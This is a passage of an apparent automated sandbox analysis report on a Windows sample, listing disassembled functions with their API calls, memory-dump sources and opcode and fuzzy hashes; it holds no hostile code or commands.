                                                                                                                    • Opcode Fuzzy Hash: b50d7c86b106402c290cb9f621d7b6fc4acc4146e71bd445599e9b23636de691
                                                                                                                    • Instruction Fuzzy Hash: 7CC1A070A022549BEF15EF6CC4C4BA97BE9EF15310F0809F9EC459F2A2DB709946CB61
                                                                                                                    Function 00B83BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 061fd71c9f5635bbfbb6c530a8cb6a010689c3e1b749a16c76f3aed01e7ed81b
                                                                                                                    • Instruction ID: 068c0e6fd38f47ddb7eef5ff801f0e80d050c765248a9ddbbd2108711efb9254
                                                                                                                    • Opcode Fuzzy Hash: 061fd71c9f5635bbfbb6c530a8cb6a010689c3e1b749a16c76f3aed01e7ed81b
                                                                                                                    • Instruction Fuzzy Hash: B971D471500B44AEDB35EB74C8919E7B7E9EF14B01F4009AEE6AB87251DA327684CF11
                                                                                                                    Function 00B88284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B88289
                                                                                                                      • Part of subcall function 00B813DC: __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                      • Part of subcall function 00B8A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506663941-0
                                                                                                                    • Opcode ID: e9b93217c9002f7becb1a7a93067f863fcd21d1d82f7f161fb802d3a04b6e9bc
                                                                                                                    • Instruction ID: cc062ac1764103a978f6f9409bf87e366f35624f2e31d45caa4ad8202059e06f
                                                                                                                    • Opcode Fuzzy Hash: e9b93217c9002f7becb1a7a93067f863fcd21d1d82f7f161fb802d3a04b6e9bc
                                                                                                                    • Instruction Fuzzy Hash: 2D4183719446589BDB24FB60CC55AEAB3F8EF00704F8404EAF18AA71A3EB755EC5CB50
                                                                                                                    Function 00B813E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                      • Part of subcall function 00B85E37: __EH_prolog.LIBCMT ref: 00B85E3C
                                                                                                                      • Part of subcall function 00B8CE40: __EH_prolog.LIBCMT ref: 00B8CE45
                                                                                                                      • Part of subcall function 00B8B505: __EH_prolog.LIBCMT ref: 00B8B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: bbbf92444e0362985152b54b82a9a3323a6a3ee7dc32619ca5de6957b74dd695
                                                                                                                    • Instruction ID: 58690fa73a202124110e42aaf0eb2d463aae85f5275199df77f7fef5fe5331d1
                                                                                                                    • Opcode Fuzzy Hash: bbbf92444e0362985152b54b82a9a3323a6a3ee7dc32619ca5de6957b74dd695
                                                                                                                    • Instruction Fuzzy Hash: AF4137B0905B40DEE724DF398885AE6FBE5BB28310F54496EE5FE83292CB716654CB10
                                                                                                                    Function 00B813DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                      • Part of subcall function 00B85E37: __EH_prolog.LIBCMT ref: 00B85E3C
                                                                                                                      • Part of subcall function 00B8CE40: __EH_prolog.LIBCMT ref: 00B8CE45
                                                                                                                      • Part of subcall function 00B8B505: __EH_prolog.LIBCMT ref: 00B8B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 5af734ea797113dcdd30abe96cec57e0dc4a18ee74e74fe2f9c8caf1c4e49c26
                                                                                                                    • Instruction ID: da2b3a741dc43a993d91232d58cdbc73badfcc644634df93f07cb81f06a63ae7
                                                                                                                    • Opcode Fuzzy Hash: 5af734ea797113dcdd30abe96cec57e0dc4a18ee74e74fe2f9c8caf1c4e49c26
                                                                                                                    • Instruction Fuzzy Hash: 574167B0905B40DEE724DF398885AE6FBE5BF28310F50496ED5FE83292CB726654CB10
                                                                                                                    Function 00B9B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B9B098
                                                                                                                      • Part of subcall function 00B813DC: __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 3f439019f59b878776f55ccfb81ea2943f926ef975d2e1ff7965ad2522227188
                                                                                                                    • Instruction ID: f4395e35bd2f934436519693877b8e538ff7df9ca08419b69c7db89740fa8a25
                                                                                                                    • Opcode Fuzzy Hash: 3f439019f59b878776f55ccfb81ea2943f926ef975d2e1ff7965ad2522227188
                                                                                                                    • Instruction Fuzzy Hash: 45318C71815259EACF14EF68D9919EEBBF8AF09300F1044EEE409B3252D735AE05CB61
                                                                                                                    Function 00BAAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00BB3A34), ref: 00BAACF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: ec9e8e6dc0bf9d6fe4ab22f02acb0d0dcaae922608572ea339244127e43bb4a6
                                                                                                                    • Instruction ID: a6c57f6a20656538af3b26d940a5ac4a701fd0362db0665ad4687282eace1b83
                                                                                                                    • Opcode Fuzzy Hash: ec9e8e6dc0bf9d6fe4ab22f02acb0d0dcaae922608572ea339244127e43bb4a6
                                                                                                                    • Instruction Fuzzy Hash: 0F110A336082256F9B229E19DC5099A73D5EB8633071642A1FC95AB264EF34DC01C7E2
                                                                                                                    Function 00B8CE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B8CE45
                                                                                                                      • Part of subcall function 00B85E37: __EH_prolog.LIBCMT ref: 00B85E3C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 4f3964839b9e626166b1cc84ee40845ca7a174b2692c442c2745540590ef1ed3
                                                                                                                    • Instruction ID: cbeb3186ea55a679d8feefed38a0ef193769ce2f28148ffdcd3b72f364a29b5e
                                                                                                                    • Opcode Fuzzy Hash: 4f3964839b9e626166b1cc84ee40845ca7a174b2692c442c2745540590ef1ed3
                                                                                                                    • Instruction Fuzzy Hash: 581170B1A01244DEEB14EB79C945BAEBBE89F54300F1044AEE446D3292DB749E04CB62
                                                                                                                    Function 00B89215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 20f1974e333f3ba97600de247c41c224a7e804c7c803ebac929fda8de73fced4
                                                                                                                    • Instruction ID: 97d5ddc6b4e0e7d873d1aa412f055fa9c08020ef0619b82714b1e2edc3e80f24
                                                                                                                    • Opcode Fuzzy Hash: 20f1974e333f3ba97600de247c41c224a7e804c7c803ebac929fda8de73fced4
                                                                                                                    • Instruction Fuzzy Hash: 12015233900528ABCF11BFA8CC819EEB7B5EF88750B0546A5E816B7172DA34CD05C7A0
                                                                                                                    Function 00BAC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BAB136: RtlAllocateHeap.NTDLL(00000008,00BB3A34,00000000,?,00BA989A,00000001,00000364,?,?,?,00B8D984,?,?,?,00000004,00B8D710), ref: 00BAB177
                                                                                                                    • _free.LIBCMT ref: 00BAC4E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction ID: 5d85432c6b2915eb71923d0e0413e3ae224b22b30eaa48f14e1ced495f88e700
                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction Fuzzy Hash: FD01D6722083056BE3318E65988596AFBE9EB8A370F25056DE59493281EF30A905C778
                                                                                                                    Function 00BAB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00BB3A34,00000000,?,00BA989A,00000001,00000364,?,?,?,00B8D984,?,?,?,00000004,00B8D710), ref: 00BAB177
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 35b8a173f4fbbada790b473bf1e58aa62c5dcdf2d2d1a7da3a2588285caa43e4
                                                                                                                    • Instruction ID: 8e5915c9bbe0f694933410fd6529569b2646d5c4490c03f958a808b39de3d9e5
                                                                                                                    • Opcode Fuzzy Hash: 35b8a173f4fbbada790b473bf1e58aa62c5dcdf2d2d1a7da3a2588285caa43e4
                                                                                                                    • Instruction Fuzzy Hash: 9CF0B43252D12477DB255A61AC25F5E77C8FF43770B188291F828BB192CF30D90186E0
                                                                                                                    Function 00BA3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00BA3C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: 5b7ce569f6a1e5e88cdd594c4362479c9cad09c5ba80e1ebebe16f48b54da503
                                                                                                                    • Instruction ID: 8e47440bf341f0ab3c251f5173c8ac7fa161febc25f69d66d2a6d9781b863009
                                                                                                                    • Opcode Fuzzy Hash: 5b7ce569f6a1e5e88cdd594c4362479c9cad09c5ba80e1ebebe16f48b54da503
                                                                                                                    • Instruction Fuzzy Hash: D4F0A0322083169F8F119EA8EC04A9A77E9EF02F307104165FA05E7190EB31EA20C790
                                                                                                                    Function 00BA8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 5205025a350fdbba8973c4a664c891f88dd4588ade22c9c04bffb8b419f1495d
                                                                                                                    • Instruction ID: 7b05517995c84bd4f3fdbdb1254e72eacee8ab5125a4493833bd7a66f1f2ecb4
                                                                                                                    • Opcode Fuzzy Hash: 5205025a350fdbba8973c4a664c891f88dd4588ade22c9c04bffb8b419f1495d
                                                                                                                    • Instruction Fuzzy Hash: 3EE06D3120E225E7EB762B659C05B9B76C8EF437B4F1502E1AC5EAB891DF61CD0086E1
                                                                                                                    Function 00B85ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B85AC2
                                                                                                                      • Part of subcall function 00B8B505: __EH_prolog.LIBCMT ref: 00B8B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: c7677fc7d8d3ba9e969f5395418178dc35a764c9159706d82cdfed538bfde405
                                                                                                                    • Instruction ID: 9031379b089745e5c4335fb344806d9e87b691406e8b750793a384cd147a6f02
                                                                                                                    • Opcode Fuzzy Hash: c7677fc7d8d3ba9e969f5395418178dc35a764c9159706d82cdfed538bfde405
                                                                                                                    • Instruction Fuzzy Hash: FB016930920690DEDB25F7B8C0517EDBBE4DF64304F5084DDA45663282DBB42B08D7A2
                                                                                                                    Function 00B8A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6C4
                                                                                                                      • Part of subcall function 00B8A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6F2
                                                                                                                      • Part of subcall function 00B8A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464966427-0
                                                                                                                    • Opcode ID: b54940568d4bee95ccde5e227e0291497347d32b688c76c65bd21b1f3d39a7ee
                                                                                                                    • Instruction ID: a64edec3b7eb9be775db6820cb6e228c0a68808bb0fd905a500a8d8dacbdcd47
                                                                                                                    • Opcode Fuzzy Hash: b54940568d4bee95ccde5e227e0291497347d32b688c76c65bd21b1f3d39a7ee
                                                                                                                    • Instruction Fuzzy Hash: A4F08931008790ABDB227BB44904BD77BD05F25331F048A8AF1FD521B6C27550D4DB23
                                                                                                                    Function 00B90E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00B90E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
